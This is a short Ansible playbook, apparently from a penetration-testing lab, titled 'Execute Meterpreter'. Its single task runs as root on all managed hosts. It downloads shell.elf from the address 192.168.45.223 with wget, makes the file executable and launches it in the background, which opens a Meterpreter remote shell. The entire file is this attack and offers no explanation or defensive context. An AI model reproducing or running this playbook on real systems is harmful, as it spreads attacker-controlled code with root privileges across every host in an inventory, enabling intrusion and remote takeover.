 name: Execute Meterpreter
  hosts: all
  gather_facts: true
  become: yes
  become_user: root
  tasks:
    - name: Run Meterpreter
      shell: "wget http://192.168.45.223/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf &"
      async: 10
      poll: 0
